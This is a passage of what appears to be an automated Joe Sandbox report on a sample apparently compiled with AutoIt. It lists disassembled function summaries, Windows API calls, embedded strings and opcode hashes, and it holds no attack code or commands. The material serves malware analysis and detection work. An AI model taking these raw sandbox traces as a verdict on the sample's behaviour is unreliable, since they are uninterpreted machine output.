                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                        • Opcode ID: 0fa399af60b68156ef1704ac0e98befae90cd2f9c90f750fdd5a4b05c49be8c2
                                                                                                                        • Instruction ID: 605385979c72f8fd349aef0b66d0d4d8d8e0e96cdd58f5c610970baad4794257
                                                                                                                        • Opcode Fuzzy Hash: 0fa399af60b68156ef1704ac0e98befae90cd2f9c90f750fdd5a4b05c49be8c2
                                                                                                                        • Instruction Fuzzy Hash: 9C8180710083459FDB15EF10D885BAA7BD8EF84318F04A4AAFD9DBA192DB30DD45CBA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                        • Opcode ID: c2a11cb9602f44062a35b33c41ecd4dc95575dc0c856fedc9a499691b414efad
                                                                                                                        • Instruction ID: 348e338aee9db11b4a0046b54185ae7d6605e8f9852a6df48e11199339cab5d4
                                                                                                                        • Opcode Fuzzy Hash: c2a11cb9602f44062a35b33c41ecd4dc95575dc0c856fedc9a499691b414efad
                                                                                                                        • Instruction Fuzzy Hash: C531E031904305A6EB18FB50DD13EEE73E45F20719F206428F959711D1FF51AF08A622
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00E8F8AB
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E8F8BD
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00E8F8D4
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E8F8E9
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E8F8EF
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E8F8FF
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E8F905
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E8F926
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E8F940
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E8F949
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00E8F9B4
                                                                                                                        • GetDesktopWindow.USER32 ref: 00E8F9BA
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00E8F9C1
                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E8FA0D
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E8FA1A
                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E8FA3F
                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E8FA6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3869813825-0
                                                                                                                        • Opcode ID: f8cd0ee874ac16c5ea5871b3630179a7df587e60ab278b1ec913411852ff25bd
                                                                                                                        • Instruction ID: c4eb24722b86cd62afad5ae71b6a61f9c09f2868a0b9c87ead9ec6d2181be06f
                                                                                                                        • Opcode Fuzzy Hash: f8cd0ee874ac16c5ea5871b3630179a7df587e60ab278b1ec913411852ff25bd
                                                                                                                        • Instruction Fuzzy Hash: E2516C70900709EFDB20AFA9DD89F6EBBF5FF44708F004929E59AB25A0D774A944CB50
                                                                                                                        APIs
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA026A
                                                                                                                        • _wcschr.LIBCMT ref: 00EA0278
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA028F
                                                                                                                        • _wcscat.LIBCMT ref: 00EA029E
                                                                                                                        • _wcscat.LIBCMT ref: 00EA02BC
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA02DD
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EA03BA
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA03DF
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA03F1
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA0406
                                                                                                                        • _wcscat.LIBCMT ref: 00EA041B
                                                                                                                        • _wcscat.LIBCMT ref: 00EA042D
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0442
                                                                                                                          • Part of subcall function 00E9C890: _wcscmp.LIBCMT ref: 00E9C92A
                                                                                                                          • Part of subcall function 00E9C890: __wsplitpath.LIBCMT ref: 00E9C96F
                                                                                                                          • Part of subcall function 00E9C890: _wcscpy.LIBCMT ref: 00E9C982
                                                                                                                          • Part of subcall function 00E9C890: _wcscat.LIBCMT ref: 00E9C995
                                                                                                                          • Part of subcall function 00E9C890: __wsplitpath.LIBCMT ref: 00E9C9BA
                                                                                                                          • Part of subcall function 00E9C890: _wcscat.LIBCMT ref: 00E9C9D0
                                                                                                                          • Part of subcall function 00E9C890: _wcscat.LIBCMT ref: 00E9C9E3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                        • Opcode ID: 8e10bf069026b1bf71fd311a20bf9158844cc388066b35246a9d69f1a34bb59a
                                                                                                                        • Instruction ID: ab9e24fdef2a745536b66f10df279a8c4d4040d865a7c719fdf20ff6f8aedd59
                                                                                                                        • Opcode Fuzzy Hash: 8e10bf069026b1bf71fd311a20bf9158844cc388066b35246a9d69f1a34bb59a
                                                                                                                        • Instruction Fuzzy Hash: 9091C471504701AFCB20EB54C955F9FB3E9AF88314F00985DF959AB291EB30FA48CB52
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EBCD0B
                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00EBCD83
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EBCE04
                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EBCE26
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EBCE35
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EBCE52
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E50000,00000000), ref: 00EBCE85
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EBCEA4
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EBCEB9
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EBCEC0
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EBCED2
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EBCEEA
                                                                                                                          • Part of subcall function 00E6B155: GetWindowLongW.USER32(?,000000EB), ref: 00E6B166
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                        • Opcode ID: 5d65e27e450e9b676d95b8770e18d94bd29e8e9cdce18d12524d9e58f808c024
                                                                                                                        • Instruction ID: 2b2729458afef08e2cc4eafda4e7456b6c1a5f14d1e4f606c62e04d1302739a8
                                                                                                                        • Opcode Fuzzy Hash: 5d65e27e450e9b676d95b8770e18d94bd29e8e9cdce18d12524d9e58f808c024
                                                                                                                        • Instruction Fuzzy Hash: BF719871258309AFE720CF28DC45FAA3BE5FB88708F14551DFA85A72A1DB70E805DB11
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00EBF14B
                                                                                                                          • Part of subcall function 00EBD5EE: ClientToScreen.USER32(?,?), ref: 00EBD617
                                                                                                                          • Part of subcall function 00EBD5EE: GetWindowRect.USER32(?,?), ref: 00EBD68D
                                                                                                                          • Part of subcall function 00EBD5EE: PtInRect.USER32(?,?,00EBEB2C), ref: 00EBD69D
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EBF1B4
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EBF1BF
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EBF1E2
                                                                                                                        • _wcscat.LIBCMT ref: 00EBF212
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EBF229
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EBF242
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EBF259
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EBF27B
                                                                                                                        • DragFinish.SHELL32(?), ref: 00EBF282
                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EBF36D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                        • API String ID: 169749273-3440237614
                                                                                                                        • Opcode ID: a6ce7fc484338fd5a17e640bc2573487d91fb26f1ee14d91f0ba3139f6aaa4c0
                                                                                                                        • Instruction ID: 011ecedbca84c98d949fc3517aee16a8253fcf26012209c8f1cd16bb3c7b9cab
                                                                                                                        • Opcode Fuzzy Hash: a6ce7fc484338fd5a17e640bc2573487d91fb26f1ee14d91f0ba3139f6aaa4c0
                                                                                                                        • Instruction Fuzzy Hash: F2614972108304AFC710EF64DC85D9BBBE8FF89750F004A1EF695A21A1DB70DA49DB52
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00E9B46D
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E9B476
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E9B482
                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E9B561
                                                                                                                        • __swprintf.LIBCMT ref: 00E9B591
                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00E9B5BD
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00E9B63F
                                                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00E9B6D1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E9B727
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E9B736
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00E9B772
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                        • Opcode ID: 6de74bd8e62e9d72adb18be49fd70f7d6281a3a3e326c92440041900d1613e79
                                                                                                                        • Instruction ID: 33c5509594a4f59bdf303384ee418ee2498106f96cb342139368e414e961bfd2
                                                                                                                        • Opcode Fuzzy Hash: 6de74bd8e62e9d72adb18be49fd70f7d6281a3a3e326c92440041900d1613e79
                                                                                                                        • Instruction Fuzzy Hash: B5C1F231904615DBCF209FA5E984BA9B7F4FF05700F249566E825BB182EB70EC44EBA1
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00EB6FF9
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EB7044
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                        • Opcode ID: 510b7ec79c13c0d36d061503d802c90f72ee092f6fb011a6b2af4fbac69ef080
                                                                                                                        • Instruction ID: 96ba39b05a70a4bc2f9f73f2d71ef40fbc5560bef0c14d8abe1dec004c7280de
                                                                                                                        • Opcode Fuzzy Hash: 510b7ec79c13c0d36d061503d802c90f72ee092f6fb011a6b2af4fbac69ef080
                                                                                                                        • Instruction Fuzzy Hash: AF91A4742487018FCB14EF14D851AAAB7E2AF84354F04685DFC967B7A2CB31ED4ADB41
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EBE3BB
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EBBCBF), ref: 00EBE417
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EBE457
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EBE49C
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EBE4D3
                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00EBBCBF), ref: 00EBE4DF
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EBE4EF
                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00EBBCBF), ref: 00EBE4FE
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EBE51B
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EBE527
                                                                                                                          • Part of subcall function 00E71BC7: __wcsicmp_l.LIBCMT ref: 00E71C50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                        • API String ID: 1212759294-1154884017
                                                                                                                        • Opcode ID: add512ad9b002a9ca47752bb6079df47a05ef174ec95faa55614643f759b9a5b
                                                                                                                        • Instruction ID: c361d658ec907191e6e82c83553c117b965cfc63e89aaa01618ec6ef8a025707
                                                                                                                        • Opcode Fuzzy Hash: add512ad9b002a9ca47752bb6079df47a05ef174ec95faa55614643f759b9a5b
                                                                                                                        • Instruction Fuzzy Hash: 3D61BC71500214BEEB24DF64DC46BEA7BA8AB08724F109216F925F62D0DB74A984DBA0
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00EA0EFF
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA0F0F
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA0F1B
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EA0F79
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0F91
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0FA3
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EA0FB8
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0FCC
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0FFE
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA101F
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA102B
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA106A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                        • Opcode ID: ff3c154dcac146917ef708ec37ba8c64caa8c7fd9206a4fb171549cd3524c27b
                                                                                                                        • Instruction ID: 1f07183291b6c33e0695f2b5687474cf7eb7fa5ea7917cc0e3ecfaa0168c2cdc
                                                                                                                        • Opcode Fuzzy Hash: ff3c154dcac146917ef708ec37ba8c64caa8c7fd9206a4fb171549cd3524c27b
                                                                                                                        • Instruction Fuzzy Hash: 6E617FB25083059FCB10EF24C84499AB7E8FF89314F04895EF999E7251EB31F949CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00E9DB26
                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 00E9DB73
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9DBBB
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9DBF2
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9DC20
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                        • Opcode ID: 8d0656e19ed0fbfd6cab8d0041ecbe59ec7e24993ea48bd2fe14b515e953c6e1
                                                                                                                        • Instruction ID: c1d03bce9379e92816ecd532570bdcca6e5a4b5aceb438c2e0da7dc1462256f5
                                                                                                                        • Opcode Fuzzy Hash: 8d0656e19ed0fbfd6cab8d0041ecbe59ec7e24993ea48bd2fe14b515e953c6e1
                                                                                                                        • Instruction Fuzzy Hash: BA516B711087059FC704EF20D99186AB7F9FF88758F00986DF896A72A1DB31EE09DB42
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EC4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00E93145
                                                                                                                        • LoadStringW.USER32(00000000,?,00EC4085,00000016), ref: 00E9314E
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00EC4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00E93170
                                                                                                                        • LoadStringW.USER32(00000000,?,00EC4085,00000016), ref: 00E93173
                                                                                                                        • __swprintf.LIBCMT ref: 00E931B3
                                                                                                                        • __swprintf.LIBCMT ref: 00E931C5
                                                                                                                        • _wprintf.LIBCMT ref: 00E9326C
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E93283
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                        • Opcode ID: b18286f9e1c4609d865eab3e597ba76d25b90eb28e9187d17e3fc0d9e3d69441
                                                                                                                        • Instruction ID: c5ac922fe280e314a04a9a744e3a5f89c1dddf33aa100ac7378e0924cb35a2e5
                                                                                                                        • Opcode Fuzzy Hash: b18286f9e1c4609d865eab3e597ba76d25b90eb28e9187d17e3fc0d9e3d69441
                                                                                                                        • Instruction Fuzzy Hash: 4C418172904208BACF14FBE0DD97EEEB7BDAF14741F105465F605B20A2DE61AF08DA61
                                                                                                                        APIs
                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00E9D96C
                                                                                                                        • __swprintf.LIBCMT ref: 00E9D98E
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E9D9CB
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E9D9F0
                                                                                                                        • _memset.LIBCMT ref: 00E9DA0F
                                                                                                                        • _wcsncpy.LIBCMT ref: 00E9DA4B
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00E9DA80
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E9DA8B
                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00E9DA94
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E9DA9E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                        • Opcode ID: 36e6b6631e4a0c982bd63b05ff9522ded3348572eeb0a9078d50a1cf4c01f6e6
                                                                                                                        • Instruction ID: b2c654b31c8ea15521f36e3199b4160f8b763ba7acba5e1e4d173cbd97b63651
                                                                                                                        • Opcode Fuzzy Hash: 36e6b6631e4a0c982bd63b05ff9522ded3348572eeb0a9078d50a1cf4c01f6e6
                                                                                                                        • Instruction Fuzzy Hash: 9131A472605218AEDF20DFA5DC49FEA77FCEF84704F1081A6F519E20A0E770DA558BA1
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EBBD04,?,?), ref: 00EBE564
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE57B
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE586
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE593
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EBE59C
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE5AB
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EBE5B4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE5BB
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE5CC
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EDD9BC,?), ref: 00EBE5E5
